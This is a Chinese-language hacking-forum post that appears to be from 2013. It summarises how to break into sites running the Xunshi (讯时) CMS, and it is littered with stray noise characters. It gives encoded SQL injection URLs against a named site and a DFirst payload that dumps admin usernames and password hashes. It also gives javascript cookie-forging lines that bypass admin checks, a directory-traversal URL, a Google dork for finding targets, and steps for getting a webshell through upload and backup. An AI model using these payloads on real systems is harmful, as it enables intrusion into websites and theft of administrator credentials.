中国网络渗透测试联盟

标题: 讯时漏洞总结 [打印本页]

作者: admin    时间: 2013-1-16 21:25
标题: 讯时漏洞总结
by:血封忆尘( L6 _9 w6 K- s1 _: a
9 [( R; j9 M0 g' j
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
) R* n$ ^# n2 b- {6 j
: t! o+ Z1 J& |0 M% s以下本文总结来自黑防去年第9期杂志上的内容...
9 f1 a+ f- Z( `  R
! S3 H5 B0 ^( p先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%& y7 s% t8 P8 z. G; X2 c
2 Y/ ?; Z/ r4 w, V: O4 y2 K
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
# v: j* g, ^; n% ?! ^6 W0 ]  v! T* C- C6 B( N/ ?! Y- K* e$ a
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
) }( ]: x  s% s7 j; P. g+ u这里一个注入# w1 \, K, d4 i7 E1 o/ E% O

; p0 ?5 D6 b- V: T* v效果如图:1 P/ B: t6 I: }1 B2 w
" y5 |/ H0 s5 w% s6 n

' ]( ^. R$ r. [: x0 M8 i( W# D: L3 {; v3 v" ?- a; \; |: f
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
6 ]# O3 \; h% _: i) r# K9 G$ d. b
/ Q: l- B1 [3 `) E! M' {7 w0 R7 c密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
( f+ B* `: H# s7 y, B! Q* A: f5 g: ?5 W
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));4 T7 |; z8 K2 O% \7 T7 M5 Q
  N% o/ c+ B  Q. ~; L* ~2 t
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
/ y" F" G# E5 S
' X. u2 v7 l* P5 U) h" V$ c$ x因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
+ h1 G, |7 S1 K! ]* ]
+ J+ H7 C. e+ N9 k" l' H  d它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
' V* g1 `/ L4 ^$ y, R' c
/ z2 S  f& w0 E# Y访问这页面来列目录..步骤如下:+ D2 C( f& v1 ]" `  }# n/ k/ S
. B  u3 Z8 x% i& |$ ~
javascript:alert(document.cookie="admindj=1") . ~9 Q0 }& V2 Q) A2 ]1 Z

% B. m* f: @: s/ c/ N' B" f8 {4 Ehttp://www.political-security.co ... asp?id=46&dir=../..# N$ [' V& Z0 K$ \

) I# F0 {9 x  G! a' u3 x# g效果如图:, A2 ?' W  V. I# w3 |

" v; @1 A' Z: B6 a
4 [  ^$ a6 v, C$ f- q& J/ i% w* \9 d$ Z, W5 e
这样全站目录都能瞧了..找到后台目录..进去..
8 K- Q' _$ Y; Q  b8 |/ ~8 c% ~2 ?% H% P0 J6 W
那么进了后台怎么拿shell??上传--备份就ok了..
; y8 J2 N1 }% A% i
+ ~$ u5 _6 d  d+ b. E, Z+ P那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..  S! X( Q7 a. \* f2 \

1 ]4 y) D# m1 U% T这个我也碰到过一次..你都可以通过列目录来实现..
6 H2 y  d3 M3 e# Y7 u7 Z% H2 P
5 D% ~* V8 b* `: Cjavascript:alert(document.cookie="admindj=1") / C9 R1 Y- ^* U, z0 T8 `

- p9 n9 ^$ u/ b, Nhttp://www.political-security.co ... p?action=BackupData & D2 O! _/ x& s% t& X
0 V/ V# j" w* O( a! h
备份ok..
" i" z, F& T. N1 G
6 }9 r, B% G7 n( }; y: L8 h那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?9 K; j8 J1 d# A; `* J1 Q  @. ~

  e' V5 g* d. h6 W% Q' U0 W1 A' F在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
- t- U" K# w: P7 T# Z
4 O3 K6 S0 U3 b3 j6 S8 ~然后访问此页面进行注入..步骤如下:: a/ n1 j* \' {" {+ {* m
0 G* e  {) n1 p1 ], I: z7 u
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")$ _* ~0 K2 k  C/ M

: z! @4 ^9 d2 m' R7 y8 H* f然后请求admin/admin_chk.asp页面# y! g6 [; A8 {/ C! q0 E/ x
+ `8 ^- P2 q/ A
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%- P1 s4 E4 K9 x% N8 [4 w
4 G* v4 Y( U$ B3 L+ x2 _1 E
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
3 ?( |8 J. M) b: O, n7 [8 e9 _# z/ }1 A: r: s
效果如图所示:
* r$ V$ N/ E9 f5 X$ ~8 ]; O& @& R4 B- `4 i' |/ r( c1 q
0 n' d/ a# Y# t. R4 R, f" j

  j& }7 |* f7 F. B, W讯时漏洞2" j: ~# w# ~8 T2 [2 |& N* i
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)$ M! ?+ F- V: Y2 E
3 k1 H7 F) s3 }& b; [, Y
1、/admin/admin_news_pl_view.asp?id=1
$ T4 m/ n+ ~% Q. {) u' g; k//id任意 填入以下语句" F" j: H! _: V5 T# l- S1 N

0 Z8 v( n+ f8 ^7 C- n- ]' @2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!3 q- m5 P& Z5 J$ m! Z, X9 Z: X+ e
: u1 A8 q. u2 i! e8 K) `; @

, k1 F5 n5 F. X% u' o+ f; E9 ?7 g/ X3 d) h. z' m
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
! a+ t; ]; @# ~. W # f# q0 ^7 s( C6 a& J+ `

7 l" \5 X. {3 y1 v# H
/ U7 A  @9 p; d1 k爆出管理员帐号和密码了9 P+ d& k, T. I+ Y- O" r$ H2 ~

4 d. z5 j7 |4 e% H3 B
- H/ O: j2 J. E2 V0 }( I9 s3 p3 w' Q; v! K# k
4、cookies进后台
7 x+ R' Y) ]9 [$ Y1 a9 J
* D$ U3 W5 `/ G) m. l, A5 [javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
1 @6 B2 u, I! R/ S . S( s! {* }, n! \( [* q( G

5 W- {/ c0 U. M' u: A7 E0 c* R- \* z! J  }9 {
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!/ X; w2 m, J% K7 P& Q5 B& L! x
  p3 e; Z& k  }

6 x' T+ C9 [1 E. \
6 T: y' W$ }! }" j6、后台有上传和备份取SHELL不难。
4 `1 |# M7 p; |5 j0 g/ ]3 x1 Q ' o0 _" X, x$ C$ y& r% P1 K3 c2 |8 s
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
9 c; i2 A7 `! h- C2 e
8 f" R& p4 J5 b3 h, _( `. a# b逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!: I( {5 G: Z6 h& u* c4 N! b
0 e% R2 B: `, I- |3 w# x# F) ]
8 O$ A2 z6 k. s; [4 e2 r  b* R

  V  M) A, k& E% L/ n7 ?5 I




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2